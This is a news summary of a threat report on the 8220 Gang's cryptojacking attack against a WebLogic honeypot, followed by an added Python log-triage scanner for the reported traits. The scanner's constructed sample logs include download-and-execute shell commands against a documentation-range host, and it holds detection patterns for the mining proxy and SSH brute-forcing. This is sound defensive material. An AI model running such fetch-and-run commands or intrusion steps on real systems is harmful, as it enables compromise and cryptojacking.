On September 17, 2024, Sekoia's Threat Detection & Research team observed an attack against an Oracle WebLogic honeypot that targeted both Windows and Linux systems. The attack shared common TTPs and IoCs with a case reported by AquaSec on September 12, 2024, strongly suggesting the involvement of the 8220 Gang, a Chinese threat actor known since 2018 for exploiting vulnerable, cloud-facing Windows and Linux web servers to deploy cryptomining ("crypto-jacking") malware.

Both intrusions targeted WebLogic servers and used similar shell scripts named "c" and "y", fetched with the lwp-download binary, for initial access. On Linux, those scripts deployed the Hadooken malware, disabled cloud protection tools, and attempted lateral movement through SSH brute-force attacks. The analysis suggests that Hadooken and K4Spreader are distinct but related Go-based malware. The PwnRig miner payload is identical across both cases: the same file hashes, the same proxy (run.on-demand[.]pw), and the same Monero wallet.
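The traits the article names (lwp-download used as a downloader for scripts called "c" and "y", traffic to the run.on-demand[.]pw proxy, and SSH password brute-forcing) are easy to turn into a first-pass triage check. The script below is an added example and is not code from the article, Sekoia or AquaSec; the log line shapes it parses (a shell/process-exec line, a generic connection line, and OpenSSH "Failed password" lines) and all sample lines are constructed for illustration, and the brute-force threshold is an arbitrary assumption.

```python
"""Added example: triage scanner for the 8220 Gang traits named in the article.

It flags (1) lwp-download invocations, with extra weight when the fetched
file is named 'c' or 'y', (2) any line mentioning the run.on-demand[.]pw
proxy, and (3) source IPs that generate a burst of SSH password failures.
Log formats and the threshold are assumptions, not part of the report.
"""
import re
from collections import defaultdict

# Indicators taken from the article; the defanged [.] is restored for matching.
PROXY_DOMAIN = "run.on-demand.pw"
DROPPER_SCRIPTS = {"c", "y"}

# Assumed line shapes: a process-exec/bash-history style line and an
# OpenSSH auth.log line. Adjust to whatever your telemetry actually emits.
EXEC_RE = re.compile(r"lwp-download\s+(?P<url>\S+)")
SSH_FAIL_RE = re.compile(
    r"Failed password for (?:invalid user )?\S+ from (?P<ip>\d+\.\d+\.\d+\.\d+)"
)


def scan_download_line(line):
    """Return a finding for a line that runs lwp-download, else None."""
    m = EXEC_RE.search(line)
    if not m:
        return None
    url = m.group("url")
    fetched = url.rstrip("/").rsplit("/", 1)[-1]  # last path component
    reasons = ["lwp-download used as downloader"]
    if fetched in DROPPER_SCRIPTS:
        reasons.append(f"fetched script named '{fetched}'")
    return {"line": line, "url": url, "reasons": reasons}


def mentions_proxy(line):
    """True if the line references the mining proxy domain from the report."""
    return PROXY_DOMAIN in line


def ssh_bruteforce_sources(lines, threshold):
    """Count SSH password failures per source IP; return those at/over threshold."""
    fails = defaultdict(int)
    for line in lines:
        m = SSH_FAIL_RE.search(line)
        if m:
            fails[m.group("ip")] += 1
    return {ip: n for ip, n in fails.items() if n >= threshold}


def scan(lines, threshold=5):
    """Run all three checks over an iterable of log lines."""
    lines = list(lines)
    return {
        "downloads": [f for f in map(scan_download_line, lines) if f],
        "proxy": [l for l in lines if mentions_proxy(l)],
        "bruteforce": ssh_bruteforce_sources(lines, threshold),
    }


# Constructed sample lines (not real telemetry); 203.0.113.0/24, 198.51.100.0/24
# and 192.0.2.0/24 are documentation ranges.
SAMPLE = [
    "sh -c 'lwp-download http://203.0.113.5/c /tmp/c; sh /tmp/c'",
    "sh -c 'lwp-download http://203.0.113.5/y /tmp/y; sh /tmp/y'",
    "wget -q https://mirror.example.org/pkg.tar.gz",
    "conn: 198.51.100.7:41222 -> run.on-demand.pw:443",
    "sshd[1201]: Failed password for root from 192.0.2.10 port 40001 ssh2",
    "sshd[1202]: Failed password for root from 192.0.2.10 port 40002 ssh2",
    "sshd[1203]: Failed password for invalid user admin from 192.0.2.10 port 40003 ssh2",
    "sshd[1204]: Failed password for root from 192.0.2.10 port 40004 ssh2",
    "sshd[1205]: Failed password for root from 192.0.2.11 port 50001 ssh2",
    "sshd[1206]: Accepted password for deploy from 192.0.2.12 port 50002 ssh2",
]

if __name__ == "__main__":
    result = scan(SAMPLE, threshold=3)
    for f in result["downloads"]:
        print("DOWNLOAD:", f["url"], "|", "; ".join(f["reasons"]))
    for l in result["proxy"]:
        print("PROXY:", l)
    for ip, n in result["bruteforce"].items():
        print(f"SSH BRUTE-FORCE: {ip} ({n} failures)")
```

On the constructed sample, the scanner reports both dropper fetches (each with the script-name reason), the one proxy connection, and 192.0.2.10 as a brute-force source while the single failure from 192.0.2.11 stays below threshold. In production the interesting part is the join: a host that both ran lwp-download and then started producing outbound SSH failures against its neighbours is a strong match for the Linux infection chain described above.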
This Cyber News was published on cybersecuritynews.com. Publication date: Tue, 01 Oct 2024 15:00:21 +0000